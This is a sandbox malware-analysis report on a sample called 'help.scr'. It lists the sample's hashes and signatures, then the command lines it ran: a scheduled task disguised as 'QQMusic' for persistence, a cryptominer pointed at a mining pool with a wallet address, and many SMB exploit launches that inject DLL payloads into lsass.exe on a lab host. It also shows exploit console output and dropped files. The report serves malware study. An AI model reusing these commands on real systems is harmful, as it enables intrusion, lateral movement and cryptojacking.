popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

help.scr

Emotet Generic Malware Malicious Library Antivirus UPX Malicious Packer ftp PE File PE64 DLL OS Processor Check PE32
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 June 15, 2024, 8:16 a.m. June 15, 2024, 8:19 a.m.
Size 9.0MB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 5315d928cff19507f66d59b174280e8a
SHA256 590d3088ed566cb3d85d48f4914cc657ee49b7d33e85c72167e7c72d81d4cb6c
CRC32 B03E60A2
ssdeep 196608:rhHMBGC3PtXtT+Was86wq1wo9JoYx5JAMdJOnZTG1IvQSaKe6NZOn:r2G07wuwasMdJOnZKVSaaNZOn
Yara
  • Malicious_Packer_Zero - Malicious Packer
  • Malicious_Library_Zero - Malicious_Library
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)
  • UPX_Zero - UPX packed file
  • Generic_Malware_Zero - Generic Malware
  • OS_Processor_Check_Zero - OS Processor Check

  • cmd.exe cmd /c schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\test22\AppData\Local\Temp\help.scr /F

    3032

  • cmd.exe cmd /c taskkill /f /im spreadEmnopq.exe&&exit

    2072

  • spreadEmnopq.exe C:\ProgramData\spreadEmnopq.exe -o stratum+tcp://auto.c3pool.org:19999 -u 42CJPfp1jJ6PXv4cbjXbBRMhp9YUZsXH6V5kEvp7XzNGKLnuTNZQVU9bhxsqBEMstvDwymNSysietQ5VubezYfoq4fT4Ptc -p WPU --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K

    2528

  • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target XP_SP0SP1_X86 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

    3556

  • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target XP_SP2SP3_X86 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

    3592

  • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target XP_SP1_X64 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

    3688

  • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target XP_SP2_X64 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

    3772

  • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2003_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

    3848

  • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2003_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

    3920

  • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2003_SP2 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

    4000

  • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target VISTA_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

    3188

  • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target VISTA_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

    3680

  • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target VISTA_SP2 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

    3948

  • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2008_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

    3596

  • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2008_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

    3808

  • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2008_SP2 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

    3852

  • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target WIN7_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

    3656

  • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target WIN7_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

    3716

  • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2008R2_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

    4012

  • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2008R2_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

    3384

  • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target WIN8_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

    4164

  • cmd.exe cmd /c cd C:\ProgramData\&&svchostlong.exe --TargetIp 192.168.56.103 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig 192.168.56.103.txt&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

    4288

  • cmd.exe cmd /c cd C:\ProgramData\&&svchostlong.exe --TargetIp 192.168.56.103 --Target XP --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig 192.168.56.103.txt&&serverlong.exe --OutConfig 192.168.56.103-dll.txt --TargetIp 192.168.56.103 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

    4352

Name Response Post-Analysis Lookup
103.56.168.192.in-addr.arpa
are.nishabig.pro
auto.c3pool.org
A 18.163.115.97
A 47.76.164.119
18.163.115.97
IP Address Status Action
164.124.101.2 Active Moloch
47.76.164.119 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: SUCCESS: The scheduled task "QQMusic" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: ERROR: The process "spreadEmnopq.exe" not found.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: Windows IP Configuration
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: Successfully flushed the DNS Resolver Cache.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: Windows IP Configuration
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: Successfully flushed the DNS Resolver Cache.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: Windows IP Configuration
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: Successfully flushed the DNS Resolver Cache.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: Windows IP Configuration
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: Successfully flushed the DNS Resolver Cache.
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: [*] Running Exploit
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: [*] Initializing Parameters
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: [+] Target 192.168.56.103:445
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: [+] Authcode: 0xa2b16704
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: [+] XorMask: 0x60
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: [+] Network Timeout: 60 seconds
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: [*] Attempting exploit method 1
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: [*] Initializing Network
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: [+] Initial smb session setup completed
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: [*] Trying pipe browser...
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: [-] Pipe not accessible (Returned code: C0000022)
console_handle: 0x0000000b
1 1 0

WriteConsoleA

 buffer: [-] Error 44 (StartSmbPipeConnections)
console_handle: 0x0000000b
1 1 0

WriteConsoleA

 buffer: [-] Error 44 (RunPlugin)
console_handle: 0x0000000b
1 1 0

WriteConsoleA

 buffer: [-] Error 44 (processParams)
console_handle: 0x0000000b
1 1 0

WriteConsoleA

 buffer: [*] Running Exploit
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: [*] Initializing Parameters
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: [+] Target 192.168.56.103:445
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: [+] Authcode: 0x31bd9308
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: [+] XorMask: 0x7a
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: [+] Network Timeout: 60 seconds
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: [*] Attempting exploit method 1
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: [*] Initializing Network
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: [+] Initial smb session setup completed
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: [*] Trying pipe browser...
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: [-] Pipe not accessible (Returned code: C0000022)
console_handle: 0x0000000b
1 1 0

WriteConsoleA

 buffer: [-] Error 44 (StartSmbPipeConnections)
console_handle: 0x0000000b
1 1 0

WriteConsoleA

 buffer: [-] Error 44 (RunPlugin)
console_handle: 0x0000000b
1 1 0

WriteConsoleA

 buffer: [-] Error 44 (processParams)
console_handle: 0x0000000b
1 1 0

WriteConsoleA

 buffer: [*] Running Exploit
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: [*] Initializing Parameters
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: [+] Target 192.168.56.103:445
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: [+] Authcode: 0x4ba8ff0f
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: [+] XorMask: 0xf7
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: [+] Network Timeout: 60 seconds
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: [*] Attempting exploit method 1
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: [*] Initializing Network
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: [+] Initial smb session setup completed
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: [*] Trying pipe browser...
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: [-] Pipe not accessible (Returned code: C0000022)
console_handle: 0x0000000b
1 1 0

WriteConsoleA

 buffer: [-] Error 44 (StartSmbPipeConnections)
console_handle: 0x0000000b
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
section .gfids
section .giats
resource name LNK
resource name SMB
resource name X64
resource name X86
suspicious_features Connection to IP address suspicious_request OPTIONS http://192.168.56.1/
suspicious_features Connection to IP address suspicious_request OPTIONS http://192.168.56.1/ipc$
request OPTIONS http://192.168.56.1/
request OPTIONS http://192.168.56.1/ipc$
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2528
region_size: 81920
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000001c30000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2528
region_size: 131072
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000024f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2528
region_size: 131072
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000026b0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2736
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72ab2000
process_handle: 0xffffffff
1 0 0
name LNK language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00874428 size 0x0005d332
name SMB language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00563fa0 size 0x00310484
name X64 language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x003971a0 size 0x0014c800
name X86 language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x004e39a0 size 0x00080600
file C:\ProgramData\pcrecpp-0.dll
file C:\ProgramData\libiconv-2.dll
file C:\ProgramData\posh.dll
file C:\ProgramData\trch-0.dll
file C:\ProgramData\pcre-0.dll
file C:\ProgramData\trfo-2.dll
file C:\ProgramData\riar-2.dll
file C:\ProgramData\pcreposix-0.dll
file C:\ProgramData\coli-0.dll
file C:\ProgramData\tibe-2.dll
file C:\ProgramData\libxml2.dll
file C:\ProgramData\tibe-1.dll
file C:\ProgramData\xdvl-0.dll
file C:\ProgramData\adfw.dll
file C:\ProgramData\cnli-0.dll
file C:\ProgramData\esco-0.dll
file C:\ProgramData\svchostlong.exe
file C:\ProgramData\crli-0.dll
file C:\ProgramData\dmgd-1.dll
file C:\ProgramData\cnli-1.dll
file C:\ProgramData\iconv.dll
file C:\ProgramData\tucl-1.dll
file C:\ProgramData\svchostromance.exe
file C:\ProgramData\exma-1.dll
file C:\ProgramData\etchCore-0.x64.dll
file C:\ProgramData\etch-0.dll
file C:\ProgramData\etchCore-0.x86.dll
file C:\ProgramData\tibe.dll
file C:\ProgramData\posh-0.dll
file C:\ProgramData\etebCore-2.x86.dll
file C:\ProgramData\trfo.dll
file C:\ProgramData\tucl.dll
file C:\ProgramData\X86.dll
file C:\ProgramData\adfw-2.dll
file C:\ProgramData\libcurl.dll
file C:\ProgramData\exma.dll
file C:\ProgramData\zibe.dll
file C:\ProgramData\trfo-0.dll
file C:\ProgramData\riar.dll
file C:\ProgramData\zlib1.dll
file C:\ProgramData\serverlong.exe
file C:\ProgramData\ssleay32.dll
file C:\ProgramData\pcla-0.dll
file C:\ProgramData\eteb-2.dll
file C:\ProgramData\libeay32.dll
file C:\ProgramData\dmgd-4.dll
file C:\ProgramData\etebCore-2.x64.dll
file C:\ProgramData\X64.dll
file C:\ProgramData\trch.dll
file C:\ProgramData\trch-1.dll
cmdline svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2008R2_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
cmdline svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target VISTA_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
cmdline svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2003_SP2 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
cmdline svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target WIN8_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
cmdline svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target WIN7_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
cmdline svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2008R2_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
cmdline svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target WIN7_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
cmdline svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2003_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
cmdline svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target XP_SP1_X64 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
cmdline svchostlong.exe --TargetIp 192.168.56.103 --Target XP --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig 192.168.56.103.txt
cmdline svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2008_SP2 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
cmdline svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target VISTA_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
cmdline svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target XP_SP2_X64 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
cmdline svchostlong.exe --TargetIp 192.168.56.103 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig 192.168.56.103.txt
cmdline svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target XP_SP2SP3_X86 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
cmdline schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\test22\AppData\Local\Temp\help.scr /F
